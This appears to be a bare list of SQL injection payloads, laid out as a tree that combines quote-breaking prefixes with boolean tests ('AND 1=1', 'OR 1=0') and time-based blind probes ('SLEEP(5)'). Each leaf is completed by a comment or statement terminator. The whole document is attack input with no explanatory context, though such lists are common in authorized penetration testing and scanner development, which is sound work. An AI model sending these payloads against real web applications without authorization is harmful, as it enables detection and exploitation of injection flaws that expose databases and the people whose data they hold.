)
├── )  SLEEP(5)
├── ) AND 1=0 
└── ) AND SLEEP(5)
'
├── '  SLEEP(5)
│   ├── '  SLEEP(5) --
│   ├── '  SLEEP(5) /*
│   └── '  SLEEP(5) ;
├── ' AND 1=1
│   ├── ' AND 1=1 --
│   ├── ' AND 1=1 /*
│   └── ' AND 1=1 ;
└── ' AND SLEEP(5)
    ├── ' AND SLEEP(5) --
    ├── ' AND SLEEP(5) /*
    └── ' AND SLEEP(5) ;
""'
├── ""' AND 1=0
│   ├── ""' AND 1=0 --
│   ├── ""' AND 1=0 /*
│   └── ""' AND 1=0 ;
├── ""' OR 1=0
│   ├── ""' OR 1=0 --
│   ├── ""' OR 1=0 /*
│   └── ""' OR 1=0 ;
└── ""' OR SLEEP(5)
    ├── ""' OR SLEEP(5) --
    ├── ""' OR SLEEP(5) /*
    └── ""' OR SLEEP(5) ;
